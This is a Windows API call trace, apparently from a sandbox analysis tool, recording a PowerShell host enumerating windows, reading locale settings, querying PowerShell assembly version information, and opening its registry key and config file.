	[0515.844] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1328
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x12d0
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x12cc
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x12c8
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1290
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1218
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1214
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x11ec
	[0515.849] WerSetFlags () returned 0x0
	[0515.857] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0517.440] CoTaskMemFree (pv=0x0) 
	[0517.441] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdaa8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdaa0 | out: pulNumLanguages=0xcdaa8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdaa0) returned 1
	[0517.441] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdaa8, pwszLanguagesBuffer=0x2c48158, pcchLanguagesBuffer=0xcdaa0 | out: pulNumLanguages=0xcdaa8, pwszLanguagesBuffer=0x2c48158, pcchLanguagesBuffer=0xcdaa0) returned 1
	[0517.446] CoTaskMemAlloc (cb=0x24) returned 0x233010
	[0517.446] GetUserDefaultLocaleName (in: lpLocaleName=0x233010, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0517.446] CoTaskMemFree (pv=0x233010) 
	[0517.469] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0517.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0517.469] CoTaskMemFree (pv=0x2a8450) 
	[0517.471] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0517.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0517.472] CoTaskMemFree (pv=0x2a8450) 
	[0517.474] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0517.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0517.474] CoTaskMemFree (pv=0x2a8450) 
	[0517.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0517.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0517.484] SetErrorMode (uMode=0x1) returned 0x1
	[0517.484] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd720 | out: lpFileInformation=0xcd720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0517.484] SetErrorMode (uMode=0x1) returned 0x1
	[0517.484] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcd990 | out: lpdwHandle=0xcd990) returned 0x94c
	[0517.485] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c4b9e8 | out: lpData=0x2c4b9e8) returned 1
	[0517.486] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd908, puLen=0xcd900 | out: lplpBuffer=0xcd908*=0x2c4ba84, puLen=0xcd900) returned 1
	[0519.455] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4bb60, puLen=0xcd870) returned 1
	[0519.455] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0519.455] CoTaskMemAlloc (cb=0x2e) returned 0x2b7ee0
	[0519.455] lstrcpyW (in: lpString1=0x2b7ee0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0519.455] CoTaskMemFree (pv=0x2b7ee0) 
	[0519.455] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4bbb4, puLen=0xcd870) returned 1
	[0519.455] lstrlenW (lpString="System.Management.Automation") returned 28
	[0519.455] CoTaskMemAlloc (cb=0x3c) returned 0x1b3b0380
	[0519.455] lstrcpyW (in: lpString1=0x1b3b0380, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0519.455] CoTaskMemFree (pv=0x1b3b0380) 
	[0519.456] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4bc10, puLen=0xcd870) returned 1
	[0519.456] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0519.456] CoTaskMemAlloc (cb=0x20) returned 0x2bcb00
	[0519.456] lstrcpyW (in: lpString1=0x2bcb00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0519.456] CoTaskMemFree (pv=0x2bcb00) 
	[0519.456] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4bc50, puLen=0xcd870) returned 1
	[0519.456] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0519.456] CoTaskMemAlloc (cb=0x44) returned 0x1b3b0380
	[0519.456] lstrcpyW (in: lpString1=0x1b3b0380, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0519.456] CoTaskMemFree (pv=0x1b3b0380) 
	[0519.456] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4bcb8, puLen=0xcd870) returned 1
	[0519.456] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0519.456] CoTaskMemAlloc (cb=0x76) returned 0x244ad0
	[0519.456] lstrcpyW (in: lpString1=0x244ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0519.456] CoTaskMemFree (pv=0x244ad0) 
	[0519.456] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4bd54, puLen=0xcd870) returned 1
	[0519.456] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0519.456] CoTaskMemAlloc (cb=0x44) returned 0x1b3b0380
	[0519.456] lstrcpyW (in: lpString1=0x1b3b0380, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0519.456] CoTaskMemFree (pv=0x1b3b0380) 
	[0519.456] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4bdb8, puLen=0xcd870) returned 1
	[0519.456] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0519.456] CoTaskMemAlloc (cb=0x58) returned 0x20ddd0
	[0519.456] lstrcpyW (in: lpString1=0x20ddd0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0519.456] CoTaskMemFree (pv=0x20ddd0) 
	[0519.456] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4be34, puLen=0xcd870) returned 1
	[0519.456] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0519.456] CoTaskMemAlloc (cb=0x20) returned 0x2bcb00
	[0519.457] lstrcpyW (in: lpString1=0x2bcb00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0519.457] CoTaskMemFree (pv=0x2bcb00) 
	[0519.457] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x2c4badc, puLen=0xcd870) returned 1
	[0519.457] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0519.457] CoTaskMemAlloc (cb=0x66) returned 0x2bbd30
	[0519.457] lstrcpyW (in: lpString1=0x2bbd30, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0519.457] CoTaskMemFree (pv=0x2bbd30) 
	[0519.457] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x0, puLen=0xcd870) returned 0
	[0519.457] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x0, puLen=0xcd870) returned 0
	[0519.457] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcd878, puLen=0xcd870 | out: lplpBuffer=0xcd878*=0x0, puLen=0xcd870) returned 0
	[0519.457] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd848, puLen=0xcd840 | out: lplpBuffer=0xcd848*=0x2c4ba84, puLen=0xcd840) returned 1
	[0519.457] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0519.457] VerLanguageNameW (in: wLang=0x0, szLang=0x23c760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0519.457] CoTaskMemFree (pv=0x23c760) 
	[0519.457] VerQueryValueW (in: pBlock=0x2c4b9e8, lpSubBlock="\\", lplpBuffer=0xcd898, puLen=0xcd890 | out: lplpBuffer=0xcd898*=0x2c4ba10, puLen=0xcd890) returned 1
	[0519.466] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0519.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.466] CoTaskMemFree (pv=0x2a8450) 
	[0519.470] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0519.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.471] CoTaskMemFree (pv=0x2a8450) 
	[0519.474] lstrlenW (lpString="䅁") returned 1
	[0519.483] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd768 | out: phkResult=0xcd768*=0x2fc) returned 0x0
	[0519.484] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd758 | out: phkResult=0xcd758*=0x300) returned 0x0
	[0519.484] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd7e8 | out: phkResult=0xcd7e8*=0x304) returned 0x0
	[0519.486] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd72c, lpData=0x0, lpcbData=0xcd728*=0x0 | out: lpType=0xcd72c*=0x1, lpData=0x0, lpcbData=0xcd728*=0x56) returned 0x0
	[0519.487] CoTaskMemAlloc (cb=0x5a) returned 0x2bbcc0
	[0519.487] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd6fc, lpData=0x2bbcc0, lpcbData=0xcd6f8*=0x56 | out: lpType=0xcd6fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd6f8*=0x56) returned 0x0
	[0519.487] CoTaskMemFree (pv=0x2bbcc0) 
	[0519.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0519.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0520.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0520.783] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0520.783] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0520.783] CoTaskMemFree (pv=0x2a8450) 
	[0524.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0524.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0526.046] CoTaskMemAlloc (cb=0x104) returned 0x2a8560
	[0526.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.047] CoTaskMemFree (pv=0x2a8560) 
	[0526.048] CoTaskMemAlloc (cb=0x104) returned 0x2a8560
	[0526.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.048] CoTaskMemFree (pv=0x2a8560) 
	[0526.874] CoTaskMemAlloc (cb=0x104) returned 0x2a8560
	[0526.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.875] CoTaskMemFree (pv=0x2a8560) 
	[0526.875] CoTaskMemAlloc (cb=0x104) returned 0x2a8560
	[0526.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.875] CoTaskMemFree (pv=0x2a8560) 
	[0526.875] CoTaskMemAlloc (cb=0x104) returned 0x2a8560
	[0526.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.875] CoTaskMemFree (pv=0x2a8560) 
	[0529.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0529.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0529.052] CoTaskMemAlloc (cb=0x104) returned 0x2a8560
	[0529.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.052] CoTaskMemFree (pv=0x2a8560) 
	[0529.055] CoTaskMemAlloc (cb=0x104) returned 0x2a8560
	[0529.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.055] CoTaskMemFree (pv=0x2a8560) 
	[0530.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0530.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0534.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0534.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0536.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0539.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0539.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0540.638] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0540.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.638] CoTaskMemFree (pv=0x2a8780) 
	[0540.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0540.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0540.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0540.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0542.545] SetErrorMode (uMode=0x1) returned 0x1
	[0542.545] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd6c0 | out: lpFileInformation=0xcd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0542.545] SetErrorMode (uMode=0x1) returned 0x1
	[0545.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
